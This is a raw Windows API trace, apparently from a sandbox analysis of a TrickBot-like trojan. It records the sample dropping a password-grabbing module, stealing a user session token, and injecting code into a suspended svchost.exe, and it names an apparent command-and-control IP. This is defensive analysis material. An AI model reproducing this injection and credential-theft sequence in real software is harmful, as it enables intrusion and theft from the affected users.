	[0197.130] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690538
	[0197.130] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690538, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690538, pdwDataLen=0x128aac) returned 1
	[0197.130] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.130] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.130] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.131] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.131] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0197.131] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.131] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690560, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690560, pdwDataLen=0x128aac) returned 1
	[0197.131] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.131] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.131] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.131] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.131] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0197.131] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.131] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2690588, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2690588, pdwDataLen=0x128aac) returned 1
	[0197.131] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.131] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.132] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.132] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.132] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0197.132] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.132] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26905b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x26905b0, pdwDataLen=0x128aac) returned 1
	[0197.132] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.132] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.133] CryptImportKey (in: hProv=0x225748, pbData=0x128aa0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128ae0 | out: phKey=0x128ae0*=0x22b68c0) returned 1
	[0197.133] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x4, pbData=0x128acc*=0x1, dwFlags=0x0) returned 1
	[0197.133] CryptSetKeyParam (hKey=0x22b68c0, dwParam=0x1, pbData=0x26906c8, dwFlags=0x0) returned 1
	[0197.152] CryptDecrypt (in: hKey=0x22b68c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c90020, pdwDataLen=0x128ad4 | out: pbData=0x2c90020, pdwDataLen=0x128ad4) returned 1
	[0197.208] CryptDestroyKey (hKey=0x22b68c0) returned 1
	[0197.208] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.208] GetVersion () returned 0x1db10106
	[0197.221] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128ae0, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128ae0) returned 0x0
	[0197.221] BCryptImportKeyPair (in: hAlgorithm=0x22ee2a8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128ae8, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128ae8) returned 0x0
	[0197.223] BCryptGetProperty (in: hObject=0x212810, pszProperty="SignatureLength", pbOutput=0x128b00, cbOutput=0x4, pcbResult=0x128ad8, dwFlags=0x0 | out: pbOutput=0x128b00, pcbResult=0x128ad8) returned 0x0
	[0197.223] BCryptVerifySignature (hKey=0x212810, pPaddingInfo=0x0, pbHash=0x22a5b60, cbHash=0x30, pbSignature=0x2da12d8, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0197.226] BCryptDestroyKey (in: hKey=0x212810 | out: hKey=0x212810) returned 0x0
	[0197.226] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee2a8, dwFlags=0x0 | out: hAlgorithm=0x22ee2a8) returned 0x0
	[0197.226] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0197.226] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1112b0) returned 0x2fd0020
	[0197.257] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff498
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x21a5f0
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2754be0
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3c0
	[0197.258] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff3c0) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3c0
	[0197.258] CharLowerBuffA (in: lpsz="autostart", cchLength=0x9 | out: lpsz="autostart") returned 0x9
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff3c0) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3c0
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3f0
	[0197.258] CharLowerBuffA (in: lpsz="all", cchLength=0x3 | out: lpsz="all") returned 0x3
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff3f0) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3f0
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff408
	[0197.258] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff408) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff408
	[0197.258] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff408) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff408
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3d8
	[0197.258] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff3d8) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3d8
	[0197.258] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff3d8) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff3d8
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff420
	[0197.258] CharLowerBuffA (in: lpsz="autoconf", cchLength=0x8 | out: lpsz="autoconf") returned 0x8
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff420) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff420
	[0197.258] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4
	[0197.258] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff420) returned 1
	[0197.258] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff420
	[0197.259] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0197.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff420) returned 1
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff420
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff480
	[0197.259] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4
	[0197.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff480) returned 1
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff480
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff378
	[0197.259] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6
	[0197.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff378) returned 1
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff378
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4b0
	[0197.259] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2
	[0197.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4b0) returned 1
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4b0
	[0197.259] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2
	[0197.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4b0) returned 1
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26906f0
	[0197.259] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4b0
	[0197.259] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff420, cbMultiByte=-1, lpWideCharStr=0x22ff4b0, cchWideChar=6 | out: lpWideCharStr="dpost") returned 6
	[0197.259] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4c8
	[0197.259] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22ff480, cbMultiByte=-1, lpWideCharStr=0x22ff4c8, cchWideChar=6 | out: lpWideCharStr="dpost") returned 6
	[0197.259] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690718
	[0197.260] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2772bb8
	[0197.260] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x2772bb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0197.261] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc
	[0197.263] WriteFile (in: hFile=0x4dc, lpBuffer=0x2eb0020*, nNumberOfBytesToWrite=0x111360, lpNumberOfBytesWritten=0x128b40, lpOverlapped=0x0 | out: lpBuffer=0x2eb0020*, lpNumberOfBytesWritten=0x128b40*=0x111360, lpOverlapped=0x0) returned 1
	[0197.288] CloseHandle (hObject=0x4dc) returned 1
	[0197.304] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2eb0020) returned 1
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2772bb8) returned 1
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5ab8) returned 1
	[0197.311] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0197.311] WinHttpCloseHandle (hInternet=0x22c4dc0) returned 1
	[0197.311] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0197.311] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad360, Size=0x10) returned 0x22ff2d0
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pwgrab32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
	[0197.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad360
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pwgrab32", cchWideChar=-1, lpMultiByteStr=0x22ad360, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pwgrab32", lpUsedDefaultChar=0x0) returned 9
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot478", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
	[0197.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff2b8
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot478", cchWideChar=-1, lpMultiByteStr=0x22ff2b8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tot478", lpUsedDefaultChar=0x0) returned 7
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50
	[0197.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6db0
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611", cchWideChar=-1, lpMultiByteStr=0x22c6db0, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611", lpUsedDefaultChar=0x0) returned 50
	[0197.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="84.182.248.91", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
	[0197.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff300
	[0197.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="84.182.248.91", cchWideChar=-1, lpMultiByteStr=0x22ff300, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="84.182.248.91", lpUsedDefaultChar=0x0) returned 14
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff2b8) returned 1
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6db0) returned 1
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff300) returned 1
	[0197.311] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0197.311] lstrcmpiW (lpString1="sTart", lpString2="start") returned 0
	[0197.311] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0197.311] GetStartupInfoW (in: lpStartupInfo=0x1285c4 | out: lpStartupInfo=0x1285c4*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2307870, hStdError=0x1d6c70)) 
	[0197.311] GetCurrentProcess () returned 0xffffffff
	[0197.311] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x128694 | out: TokenHandle=0x128694*=0x498) returned 1
	[0197.312] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x128650 | out: lpLuid=0x128650*(LowPart=0x7, HighPart=0)) returned 1
	[0197.312] AdjustTokenPrivileges (in: TokenHandle=0x498, DisableAllPrivileges=0, NewState=0x12864c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x128608, ReturnLength=0x128660 | out: PreviousState=0x128608, ReturnLength=0x128660) returned 1
	[0197.312] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x128664, pCount=0x128674 | out: ppSessionInfo=0x128664, pCount=0x128674) returned 1
	[0197.314] WTSFreeMemory (pMemory=0x22a5b60) 
	[0197.314] RevertToSelf () returned 1
	[0197.314] WTSQueryUserToken (SessionId=0x1, phToken=0x128684*=0xffffffff) returned 1
	[0197.314] DuplicateTokenEx (in: hExistingToken=0x4dc, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x128698 | out: phNewToken=0x128698*=0x4cc) returned 1
	[0197.314] CloseHandle (hObject=0x4dc) returned 1
	[0197.314] GetTokenInformation (in: TokenHandle=0x4cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128690 | out: TokenInformation=0x0, ReturnLength=0x128690) returned 0
	[0197.315] GetLastError () returned 0x7a
	[0197.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0197.315] GetTokenInformation (in: TokenHandle=0x4cc, TokenInformationClass=0x1, TokenInformation=0x22a5b60, TokenInformationLength=0x24, ReturnLength=0x128690 | out: TokenInformation=0x22a5b60, ReturnLength=0x128690) returned 1
	[0197.315] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a5b68*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x1282b0, cchName=0x128670, ReferencedDomainName=0x1280b0, cchReferencedDomainName=0x128670, peUse=0x128648 | out: Name="2XC7u663GxWc", cchName=0x128670, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128670, peUse=0x128648) returned 1
	[0197.315] LoadUserProfileW () returned 0x1
	[0197.357] CreateEnvironmentBlock () returned 0x1
	[0197.360] CreateProcessAsUserW (in: hToken=0x4cc, lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000424, lpEnvironment=0x272c4c8, lpCurrentDirectory=0x0, lpStartupInfo=0x1285c4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2307870, hStdError=0x1d6c70), lpProcessInformation=0x128638 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128638*(hProcess=0x4a8, hThread=0x140, dwProcessId=0x6d8, dwThreadId=0x524)) returned 1
	[0197.365] UnloadUserProfile () returned 0x1
	[0197.368] CloseHandle (hObject=0x4cc) returned 1
	[0197.368] DestroyEnvironmentBlock () returned 0x1
	[0197.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0197.368] AdjustTokenPrivileges (in: TokenHandle=0x498, DisableAllPrivileges=0, NewState=0x128608, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0197.368] CloseHandle (hObject=0x498) returned 1
	[0197.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307870) returned 1
	[0197.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307870
	[0197.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x498
	[0197.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4cc
	[0197.368] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x49c
	[0197.368] GetCurrentProcess () returned 0xffffffff
	[0197.368] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x498, hTargetProcessHandle=0x4a8, lpTargetHandle=0x128710, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128710*=0x4) returned 1
	[0197.368] GetCurrentProcess () returned 0xffffffff
	[0197.369] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4cc, hTargetProcessHandle=0x4a8, lpTargetHandle=0x128714, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128714*=0x8) returned 1
	[0197.369] GetCurrentProcess () returned 0xffffffff
	[0197.369] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x49c, hTargetProcessHandle=0x4a8, lpTargetHandle=0x128718, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128718*=0xc) returned 1
	[0197.369] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0197.369] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1285bc*=0x16f) returned 1
	[0197.369] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.370] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0197.370] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0197.370] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0197.370] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0197.370] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0197.370] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0197.370] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0197.371] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0197.371] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0x60000
	[0197.371] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x128710*, nSize=0x70, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0x128710*, lpNumberOfBytesWritten=0x1285bc*=0x70) returned 1
	[0197.371] NtQueryInformationProcess (in: ProcessHandle=0x4a8, ProcessInformationClass=0x0, ProcessInformation=0x1285a4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1285a4, ReturnLength=0x0) returned 0x0
	[0197.371] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x7ffdf000, lpBuffer=0x1285bc, nSize=0x10, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x1285bc*, lpNumberOfBytesRead=0x128448*=0x10) returned 1
	[0197.371] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x600000, lpBuffer=0x128564, nSize=0x40, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x128564*, lpNumberOfBytesRead=0x128448*=0x40) returned 1
	[0197.371] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x6000d8, lpBuffer=0x12846c, nSize=0xf8, lpNumberOfBytesRead=0x128448 | out: lpBuffer=0x12846c*, lpNumberOfBytesRead=0x128448*=0xf8) returned 1
	[0197.371] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x602104, lpBuffer=0x128780*, nSize=0xc, lpNumberOfBytesWritten=0x1285bc | out: lpBuffer=0x128780*, lpNumberOfBytesWritten=0x1285bc*=0xc) returned 1
	[0197.372] ResetEvent (hEvent=0x4cc) returned 1
	[0197.372] ResetEvent (hEvent=0x498) returned 1
	[0197.372] ResumeThread (hThread=0x140) returned 0x1
	[0197.383] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.384] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x10000000, dwSize=0x119000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000
	[0197.384] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000
